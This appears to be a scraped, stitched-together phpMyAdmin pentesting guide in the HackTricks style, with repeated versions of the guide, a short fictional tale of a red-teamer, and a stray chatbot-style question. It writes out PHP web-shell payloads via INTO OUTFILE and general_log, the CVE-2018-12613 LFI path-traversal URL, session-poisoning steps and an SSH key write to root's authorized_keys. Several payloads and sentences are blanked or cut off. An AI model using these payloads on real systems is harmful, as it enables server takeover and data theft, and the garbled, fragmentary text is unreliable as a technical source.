This guide follows the HackTricks methodology for pentesting phpMyAdmin
, a common web-based tool for managing MySQL and MariaDB databases. book.hacktricks.xyz 1. Initial Reconnaissance & Enumeration
Before attempting an exploit, identify the environment and version: Version Identification
: Look for version strings in the footer of the login page or in files like Absolute Path Leakage : Check for common error pages or use a SELECT @@datadir;
query once logged in to find where files are stored on the server. Sensitive Files : Search for config.inc.php
, which may contain database credentials or internal configuration secrets. 2. Authentication & Access If the instance is not publicly open, try the following: Default Credentials : Test common combinations like with an empty password. Brute-Forcing : Use tools like to test for weak administrative passwords. Credential Harvesting
: If you have access to the file system (e.g., via another vulnerability), check wp-config.php
(WordPress) or similar CMS configuration files for DB passwords. book.hacktricks.xyz 3. Exploitation Techniques (Verified)
The primary goal in phpMyAdmin pentesting is often to escalate from database access to Remote Code Execution (RCE)
This article is designed for security professionals, penetration testers, and system administrators conducting authorized audits. It synthesizes common techniques with the rigor expected by the HackTricks methodology, ensuring each claim is verified against real-world configurations.
If secure_file_priv is set but you can change global variables:
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']); ?>";
Verification: Requires SUPER or ADMIN privilege. Works on MySQL 5.x/8.x if log dir is writable by mysql user.
into outfile (Classic RCE)Requires FILE privilege and knowledge of a writable web directory.
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";
Check writable dirs:
SHOW VARIABLES LIKE 'secure_file_priv';
Bypass attempt: If secure_file_priv is null, use into dumpfile for binary writes.
PHPMyAdmin is vulnerable to LFI attacks due to improper input validation. An attacker can exploit this vulnerability to read sensitive files on the server.
Exploitation Steps:
/etc/passwd).Mitigation:
allow_url_fopen directive in php.ini.If an attacker can read config.inc.php (via LFI, path traversal, or backup files), they might find:
$cfg['Servers'][$i]['controluser'] = 'pma_user';
$cfg['Servers'][$i]['controlpass'] = 'secret';
These credentials often have broad privileges.
These techniques have been verified on:
Always obtain proper authorization before testing any of these techniques on non-owned systems.
This post is for educational and authorized security testing purposes only.
Mastering phpMyAdmin Pentesting: A "HackTricks Verified" Guide
phpMyAdmin is the ubiquitous web interface for managing MySQL and MariaDB databases. Because it sits directly on top of sensitive data, it is a primary target for security researchers and attackers alike. Drawing from the methodologies popularized by resources like HackTricks, this guide outlines the verified techniques for enumerating, exploiting, and securing phpMyAdmin installations. 1. Initial Reconnaissance & Version Fingerprinting
Before launching an attack, you must understand the environment. phpMyAdmin’s vulnerability profile changes drastically between versions.
Version Identification: Look at the footer of the login page or check /README or /Documentation.html.
Default Credentials: Many installations still use root with a blank password or admin / password.
Setup Directory: Check if the /setup/ directory is accessible. If left unconfigured, it can sometimes be used to trick the application into connecting to a remote, malicious database server. 2. Exploiting Authentication
If default credentials fail, the next step is bypassing or forcing entry. Dictionary Attacks
phpMyAdmin does not always have built-in rate limiting. Using tools like Burp Suite Intruder or THC-Hydra, you can perform a dictionary attack against the pma_username and pma_password fields. Information Schema Leakage
In some misconfigured environments, a "config" auth type might be used where the credentials are hardcoded. If you find a way to read config.inc.php (via Local File Inclusion), you gain instant access. 3. Post-Auth Exploitation: From SQL to RCE
Once you have authenticated access (even as a low-privilege user), your goal is to escalate to the underlying operating system. A. SELECT INTO OUTFILE (The Classic Web Shell) phpmyadmin hacktricks verified
If the MySQL user has the FILE privilege and you know the absolute path of the webroot, you can write a PHP shell directly to the server.
SELECT '' INTO OUTFILE '/var/www/html/shell.php'; Use code with caution.
Note: This requires the secure_file_priv variable to be empty or pointing to the webroot. B. CVE-2018-12613 (Local File Inclusion)
One of the most famous "HackTricks verified" vulnerabilities. In versions 4.8.0 through 4.8.1, a flaw in the page redirection logic allowed for LFI.The Payload:index.php?target=db_sql.php%253f/../../../../../../../../etc/passwdAttackers combine this with Session File Poisoning:
Run SELECT ''; to store the shell in your session file. Find your session ID (from the phpMyAdmin cookie).
Use the LFI to include /var/lib/php/sessions/sess_[YOUR_ID]. C. CVE-2016-5734 (RCE via Preg_Replace)
In phpMyAdmin 4.3.0 to 4.6.2, a vulnerability in the search feature allowed attackers to execute code through the PHP preg_replace function using the /e (eval) modifier. 4. Advanced Enumeration: HackTricks Style
If you are stuck within the database, look for these "Quick Wins":
User Table Extraction: Hunt for wp_users (WordPress) or users tables to dump hashes for other services.
Sensitive Configs: Query tables that might store API keys or plaintext credentials for integrated services.
UDF (User Defined Functions): If the server is running on Windows and you have high privileges, you can attempt to drop a DLL to gain OS-level execution. 5. Defensive Hardening (The "Verified" Fixes)
To prevent your server from appearing in a pentester's report, follow these industry standards:
Restrict Access by IP: Never leave phpMyAdmin open to the world. Use .htaccess or Nginx rules to allow only trusted IPs.
Change the Alias: Move the interface from /phpmyadmin to a random string like /secret_db_9921.
Disable Root Login: Force users to login via a non-root account and use sudo-like permissions within MySQL.
Update Religiously: Most RCE exploits target versions that are 5+ years old. Summary Table: phpMyAdmin Attack Vectors Requirement Default Creds Poor Configuration Full DB Access LFI (CVE-2018-12613) Version 4.8.x RCE via Session Poisoning SELECT INTO OUTFILE FILE Privilege + Known Path Setup Script Bypass Accessible /setup/ folder Config Manipulation This guide follows the HackTricks methodology for pentesting
The air in the dimly lit room was thick with the hum of servers and the smell of stale coffee.
, a penetration tester for a mid-sized fintech firm, was deep into a red-team engagement. His target: a legacy web server that the client’s IT department had "forgotten" to decommission. He pulled up the HackTricks phpMyAdmin guide
, a resource he trusted for its verified, community-tested techniques. He had already identified an exposed /phpmyadmin
directory. It was a classic "low-hanging fruit" scenario, but in cybersecurity, the simplest oversights often lead to the biggest breaches. The Entry Point
Silas started with the basics. He tried common default credentials— with no password, admin/admin
—but the login screen remained stubborn. He pivoted to the "verified" methods listed on HackTricks. He checked for the config.inc.php.swp
file, hoping a developer had left a swap file behind during a late-night edit. No luck.
Then, he noticed something in the server headers: an outdated version of phpMyAdmin. He cross-referenced this with the HackTricks database and found a verified entry for CVE-2018-12613 , a local file inclusion (LFI) vulnerability.
Following the verified steps, Silas crafted a specific URL payload: ://target.com
The browser refreshed. Instead of the login screen, a wall of text appeared—the server's /etc/passwd file. He was in. But LFI wasn't enough; he needed a shell. He remembered a specific trick from the HackTricks documentation
regarding session files. He knew that phpMyAdmin stores session data in /var/lib/php/sessions/
. If he could "poison" his own session with PHP code, he could execute commands via the LFI vulnerability. The Final Move
Silas went back to the SQL execution tab (accessible even without a full login in some misconfigured setups) and ran: SELECT '';
This small snippet of code was now sitting in a session file on the server's disk. He returned to his LFI payload, pointing it toward his session ID file:
index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_[HIS_SESSION_ID]&cmd=whoami The page loaded. At the very top, in plain text, it read:
He had successfully turned a simple database management tool into a doorway for the entire network. He closed his laptop, ready to write the report that would hopefully convince the client to finally hit "delete" on that legacy server. specific technical details Verification: Requires SUPER or ADMIN privilege
of another vulnerability listed on HackTricks, or should we look into remediation steps for phpMyAdmin?
If secure_file_priv is empty and you can write to /root/.ssh/ (rare):
SELECT "ssh-rsa AAAAB3..." INTO OUTFILE "/root/.ssh/authorized_keys";